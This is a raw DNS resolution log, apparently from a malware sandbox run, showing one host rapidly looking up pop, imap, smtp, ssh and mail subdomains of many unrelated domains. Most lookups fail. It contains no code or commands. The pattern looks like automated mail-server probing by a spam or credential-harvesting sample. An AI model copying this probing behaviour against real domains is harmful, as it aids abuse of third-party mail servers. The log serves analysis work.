Dec 22, 2023 21:15:00.604367971 CET	1.1.1.1	192.168.2.4	0xab89	Name error (3)	pop.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.613006115 CET	1.1.1.1	192.168.2.4	0x41d0	Name error (3)	pop.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.628345966 CET	1.1.1.1	192.168.2.4	0xf35e	Name error (3)	caribbean360-com.p20.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.637734890 CET	1.1.1.1	192.168.2.4	0x5958	Name error (3)	pop.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.638492107 CET	1.1.1.1	192.168.2.4	0xa490	Name error (3)	e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.642721891 CET	1.1.1.1	192.168.2.4	0xc4a8	Name error (3)	pop.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.666902065 CET	1.1.1.1	192.168.2.4	0x54e	Name error (3)	imap.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.666918039 CET	1.1.1.1	192.168.2.4	0x54e	Name error (3)	imap.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.672950029 CET	1.1.1.1	192.168.2.4	0x8c74	Name error (3)	pop.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.696758032 CET	1.1.1.1	192.168.2.4	0x2953	Name error (3)	mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.696800947 CET	1.1.1.1	192.168.2.4	0x2953	Name error (3)	mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.698379040 CET	1.1.1.1	192.168.2.4	0xb0d5	Name error (3)	ssh.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.701802969 CET	1.1.1.1	192.168.2.4	0x6308	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.9.0	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.701802969 CET	1.1.1.1	192.168.2.4	0x6308	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.41.0	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.701802969 CET	1.1.1.1	192.168.2.4	0x6308	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.11.2	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.701802969 CET	1.1.1.1	192.168.2.4	0x6308	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.41.4	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.701802969 CET	1.1.1.1	192.168.2.4	0x6308	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.40.0	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.701802969 CET	1.1.1.1	192.168.2.4	0x6308	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.41.3	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.702883005 CET	1.1.1.1	192.168.2.4	0xc19a	Name error (3)	ssh.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.710091114 CET	1.1.1.1	192.168.2.4	0xd708	Name error (3)	pop.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.710715055 CET	1.1.1.1	192.168.2.4	0x421a	Name error (3)	pop.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.712584019 CET	1.1.1.1	192.168.2.4	0x17d1	Name error (3)	mailgate.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.722634077 CET	1.1.1.1	192.168.2.4	0x2962	No error (0)	viruswall.tvs-e.in		115.111.182.213	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.723562002 CET	1.1.1.1	192.168.2.4	0x494b	Name error (3)	pop.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.738636971 CET	1.1.1.1	192.168.2.4	0x8e93	Name error (3)	pop3.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.740938902 CET	1.1.1.1	192.168.2.4	0x426b	Name error (3)	pop3.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.742042065 CET	1.1.1.1	192.168.2.4	0x5f62	Name error (3)	pop.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.816751003 CET	1.1.1.1	192.168.2.4	0x6308	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.40.0	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.816751003 CET	1.1.1.1	192.168.2.4	0x6308	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.41.0	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.816751003 CET	1.1.1.1	192.168.2.4	0x6308	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.41.3	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.816751003 CET	1.1.1.1	192.168.2.4	0x6308	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.41.4	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.816751003 CET	1.1.1.1	192.168.2.4	0x6308	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.9.0	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.816751003 CET	1.1.1.1	192.168.2.4	0x6308	No error (0)	derrickandbriggs-com.mail.protection.outlook.com		52.101.11.2	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.817610979 CET	1.1.1.1	192.168.2.4	0x494b	Name error (3)	pop.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.818392992 CET	1.1.1.1	192.168.2.4	0x8eda	Name error (3)	pop.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.825664997 CET	1.1.1.1	192.168.2.4	0xb0d5	Name error (3)	ssh.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.826569080 CET	1.1.1.1	192.168.2.4	0xc19a	Name error (3)	ssh.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.827061892 CET	1.1.1.1	192.168.2.4	0x421a	Name error (3)	pop.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.846024036 CET	1.1.1.1	192.168.2.4	0x216c	No error (0)	ismaworld-com.mail.protection.outlook.com		104.47.74.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.846086025 CET	1.1.1.1	192.168.2.4	0x216c	No error (0)	ismaworld-com.mail.protection.outlook.com		104.47.74.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.887914896 CET	1.1.1.1	192.168.2.4	0x8eda	Name error (3)	pop.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.928796053 CET	1.1.1.1	192.168.2.4	0x5c9d	Name error (3)	imap.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:00.928812027 CET	1.1.1.1	192.168.2.4	0x5c9d	Name error (3)	imap.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.001207113 CET	1.1.1.1	192.168.2.4	0x5a4b	Name error (3)	ssh.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.127091885 CET	1.1.1.1	192.168.2.4	0x412b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.9.11	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.127091885 CET	1.1.1.1	192.168.2.4	0x412b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.8.46	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.127091885 CET	1.1.1.1	192.168.2.4	0x412b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.11.9	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.127091885 CET	1.1.1.1	192.168.2.4	0x412b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.42.9	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.127091885 CET	1.1.1.1	192.168.2.4	0x412b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.8.42	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.127091885 CET	1.1.1.1	192.168.2.4	0x412b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.40.4	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.216039896 CET	1.1.1.1	192.168.2.4	0x412b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.9.11	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.216039896 CET	1.1.1.1	192.168.2.4	0x412b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.8.46	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.216039896 CET	1.1.1.1	192.168.2.4	0x412b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.11.9	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.216039896 CET	1.1.1.1	192.168.2.4	0x412b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.42.9	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.216039896 CET	1.1.1.1	192.168.2.4	0x412b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.8.42	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.216039896 CET	1.1.1.1	192.168.2.4	0x412b	No error (0)	irelandventures-com01i.mail.protection.outlook.com		52.101.40.4	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.228233099 CET	1.1.1.1	192.168.2.4	0x4e4f	Name error (3)	9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.237993956 CET	1.1.1.1	192.168.2.4	0xf8c9	Name error (3)	hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.298435926 CET	1.1.1.1	192.168.2.4	0x57b1	No error (0)	viruswall.tvs-e.in		115.111.182.213	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.316905975 CET	1.1.1.1	192.168.2.4	0x867b	Server failure (2)	ssh.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.316945076 CET	1.1.1.1	192.168.2.4	0x867b	Server failure (2)	ssh.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.317226887 CET	1.1.1.1	192.168.2.4	0x867b	Server failure (2)	ssh.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.317572117 CET	1.1.1.1	192.168.2.4	0x49b5	Server failure (2)	mail.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.317610979 CET	1.1.1.1	192.168.2.4	0x49b5	Server failure (2)	mail.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.317646980 CET	1.1.1.1	192.168.2.4	0x49b5	Server failure (2)	mail.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.325963020 CET	1.1.1.1	192.168.2.4	0x5c1f	No error (0)	aspmx3.googlemail.com		209.85.202.27	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.329819918 CET	1.1.1.1	192.168.2.4	0x5039	Name error (3)	saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.332772017 CET	1.1.1.1	192.168.2.4	0x9721	Name error (3)	earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.335088015 CET	1.1.1.1	192.168.2.4	0xe8f3	Name error (3)	mailgate.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.338165998 CET	1.1.1.1	192.168.2.4	0x21fe	Name error (3)	smartiebritches-com.mail.protection.outlook.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.344635963 CET	1.1.1.1	192.168.2.4	0x2160	Name error (3)	mail.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.347412109 CET	1.1.1.1	192.168.2.4	0x6e1	Name error (3)	ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.360799074 CET	1.1.1.1	192.168.2.4	0xe255	Name error (3)	mail.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.363368988 CET	1.1.1.1	192.168.2.4	0xa8ef	Name error (3)	ssh.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.370482922 CET	1.1.1.1	192.168.2.4	0x254b	Name error (3)	gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.373383999 CET	1.1.1.1	192.168.2.4	0xa768	Name error (3)	daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.375055075 CET	1.1.1.1	192.168.2.4	0x51b2	Name error (3)	ssh.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.387895107 CET	1.1.1.1	192.168.2.4	0x6e1	Name error (3)	ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.390139103 CET	1.1.1.1	192.168.2.4	0xe73	Name error (3)	ssh.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.390594006 CET	1.1.1.1	192.168.2.4	0x6ee	Name error (3)	nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.440910101 CET	1.1.1.1	192.168.2.4	0x631f	Name error (3)	ssh.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.483349085 CET	1.1.1.1	192.168.2.4	0x22ad	Name error (3)	ssh.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.486938000 CET	1.1.1.1	192.168.2.4	0xe255	Name error (3)	mail.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.489418030 CET	1.1.1.1	192.168.2.4	0x1370	Name error (3)	pop.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.500813961 CET	1.1.1.1	192.168.2.4	0xa8ef	Name error (3)	ssh.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.518213987 CET	1.1.1.1	192.168.2.4	0x5e43	Name error (3)	dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.519562960 CET	1.1.1.1	192.168.2.4	0x1be9	Name error (3)	ssh.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.551151991 CET	1.1.1.1	192.168.2.4	0x87ae	Name error (3)	firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.552831888 CET	1.1.1.1	192.168.2.4	0x631f	Name error (3)	ssh.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.554980040 CET	1.1.1.1	192.168.2.4	0xec58	Name error (3)	ssh.gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.583791018 CET	1.1.1.1	192.168.2.4	0xd203	Name error (3)	ssh.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.588423967 CET	1.1.1.1	192.168.2.4	0x3f90	Name error (3)	ssh.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.595868111 CET	1.1.1.1	192.168.2.4	0x7b4a	Name error (3)	mailgate.valentinegrowers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.610724926 CET	1.1.1.1	192.168.2.4	0x4b04	Name error (3)	excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.613065958 CET	1.1.1.1	192.168.2.4	0xe166	Name error (3)	pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.614168882 CET	1.1.1.1	192.168.2.4	0xe77b	Name error (3)	ssh.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.626238108 CET	1.1.1.1	192.168.2.4	0x2ce5	Name error (3)	ssh.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.637466908 CET	1.1.1.1	192.168.2.4	0x4087	Name error (3)	ssh.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.639255047 CET	1.1.1.1	192.168.2.4	0x46a9	Name error (3)	ssh.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.639389038 CET	1.1.1.1	192.168.2.4	0x1be9	Name error (3)	ssh.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.640614033 CET	1.1.1.1	192.168.2.4	0xc473	Name error (3)	ssh.chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.640683889 CET	1.1.1.1	192.168.2.4	0x25f	Name error (3)	pop3.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.640974998 CET	1.1.1.1	192.168.2.4	0xf29e	Name error (3)	ssh.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.641304016 CET	1.1.1.1	192.168.2.4	0xfd8d	Name error (3)	ssh.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.642355919 CET	1.1.1.1	192.168.2.4	0x5e43	Name error (3)	dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.643330097 CET	1.1.1.1	192.168.2.4	0x99da	Name error (3)	ssh.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.647780895 CET	1.1.1.1	192.168.2.4	0x4442	Name error (3)	cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.648664951 CET	1.1.1.1	192.168.2.4	0xe535	Name error (3)	ssh.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.652920008 CET	1.1.1.1	192.168.2.4	0xd00	Name error (3)	mail.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.661005974 CET	1.1.1.1	192.168.2.4	0x8ff8	Name error (3)	pop.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.662842035 CET	1.1.1.1	192.168.2.4	0x8ff8	Name error (3)	pop.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.672394037 CET	1.1.1.1	192.168.2.4	0x7d04	Name error (3)	sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.677160025 CET	1.1.1.1	192.168.2.4	0xd203	Name error (3)	ssh.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.684312105 CET	1.1.1.1	192.168.2.4	0xf786	Name error (3)	mail.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.698947906 CET	1.1.1.1	192.168.2.4	0x3f90	Name error (3)	ssh.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.699207067 CET	1.1.1.1	192.168.2.4	0xf61e	Name error (3)	joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.710570097 CET	1.1.1.1	192.168.2.4	0x24ba	Name error (3)	imap.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.732438087 CET	1.1.1.1	192.168.2.4	0x6a7f	Name error (3)	dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.802309990 CET	1.1.1.1	192.168.2.4	0x58ee	Name error (3)	ssh.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.802423000 CET	1.1.1.1	192.168.2.4	0x58ee	Name error (3)	ssh.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.806962967 CET	1.1.1.1	192.168.2.4	0x7d04	Name error (3)	sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.830595970 CET	1.1.1.1	192.168.2.4	0x24ba	Name error (3)	imap.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.867688894 CET	1.1.1.1	192.168.2.4	0x302d	Name error (3)	imap.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.891344070 CET	1.1.1.1	192.168.2.4	0x3b0c	Name error (3)	mail.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.894313097 CET	1.1.1.1	192.168.2.4	0xd032	Name error (3)	ssh.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.897547960 CET	1.1.1.1	192.168.2.4	0x259d	Name error (3)	mailgate.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.909123898 CET	1.1.1.1	192.168.2.4	0x6313	Name error (3)	ssh.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.910871983 CET	1.1.1.1	192.168.2.4	0x16c8	Name error (3)	mailgate.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.923855066 CET	1.1.1.1	192.168.2.4	0xc97	Name error (3)	mail.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.924478054 CET	1.1.1.1	192.168.2.4	0x5959	Name error (3)	imap.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.929308891 CET	1.1.1.1	192.168.2.4	0x67f9	Name error (3)	imap.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.935275078 CET	1.1.1.1	192.168.2.4	0xd166	Name error (3)	mail.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.937002897 CET	1.1.1.1	192.168.2.4	0xe6b	Name error (3)	ssh.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.957319021 CET	1.1.1.1	192.168.2.4	0x11b2	Name error (3)	smtp.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.960123062 CET	1.1.1.1	192.168.2.4	0x51c8	Name error (3)	ssh.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.963413000 CET	1.1.1.1	192.168.2.4	0xe924	Name error (3)	ssh.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:01.963460922 CET	1.1.1.1	192.168.2.4	0xe924	Name error (3)	ssh.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.015825987 CET	1.1.1.1	192.168.2.4	0x259d	Name error (3)	mailgate.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.044334888 CET	1.1.1.1	192.168.2.4	0xc97	Name error (3)	mail.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.044584990 CET	1.1.1.1	192.168.2.4	0x5959	Name error (3)	imap.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.048609018 CET	1.1.1.1	192.168.2.4	0x340	Name error (3)	imap.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.064750910 CET	1.1.1.1	192.168.2.4	0x4de9	Name error (3)	imap.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.069437981 CET	1.1.1.1	192.168.2.4	0x51c8	Name error (3)	ssh.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.079518080 CET	1.1.1.1	192.168.2.4	0x5d6	Name error (3)	imap.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.087969065 CET	1.1.1.1	192.168.2.4	0x5d41	Name error (3)	imap.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.123785019 CET	1.1.1.1	192.168.2.4	0xb3aa	Name error (3)	caribbean360-com.p30.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.128834009 CET	1.1.1.1	192.168.2.4	0x505e	Name error (3)	pop3.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.129759073 CET	1.1.1.1	192.168.2.4	0xd06	Name error (3)	imap.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.142694950 CET	1.1.1.1	192.168.2.4	0x70fb	Name error (3)	imap.chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.169502020 CET	1.1.1.1	192.168.2.4	0xb67a	Name error (3)	imap.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.200807095 CET	1.1.1.1	192.168.2.4	0x5d41	Name error (3)	imap.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.201112032 CET	1.1.1.1	192.168.2.4	0x5d6	Name error (3)	imap.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.205003023 CET	1.1.1.1	192.168.2.4	0xfa04	Name error (3)	mail.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.206229925 CET	1.1.1.1	192.168.2.4	0x429e	Name error (3)	imap.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.211595058 CET	1.1.1.1	192.168.2.4	0xdf91	Name error (3)	imap.asdfhjlasdfhjlk1.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.216814041 CET	1.1.1.1	192.168.2.4	0xf6f9	Name error (3)	mail.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.235361099 CET	1.1.1.1	192.168.2.4	0xb3aa	Name error (3)	caribbean360-com.p30.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.237669945 CET	1.1.1.1	192.168.2.4	0x678e	Name error (3)	imap.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.239439011 CET	1.1.1.1	192.168.2.4	0x9466	Name error (3)	imap.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.241560936 CET	1.1.1.1	192.168.2.4	0xeaa2	Name error (3)	imap.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.243675947 CET	1.1.1.1	192.168.2.4	0x565d	Name error (3)	pop3.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.243815899 CET	1.1.1.1	192.168.2.4	0xa28a	Name error (3)	imap.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.260555983 CET	1.1.1.1	192.168.2.4	0x8fe8	Name error (3)	imap.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.260611057 CET	1.1.1.1	192.168.2.4	0x8fe8	Name error (3)	imap.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.260730028 CET	1.1.1.1	192.168.2.4	0xba2c	Name error (3)	ssh.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.264736891 CET	1.1.1.1	192.168.2.4	0x7982	Name error (3)	imap.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.274682999 CET	1.1.1.1	192.168.2.4	0x6e12	Name error (3)	imap.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.284713030 CET	1.1.1.1	192.168.2.4	0x8c12	Name error (3)	pop3.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:02.287143946 CET	1.1.1.1	192.168.2.4	0x9e93	Name error (3)	imap.vesond.com	none	none	A (IP address)	IN (0x0001)	false
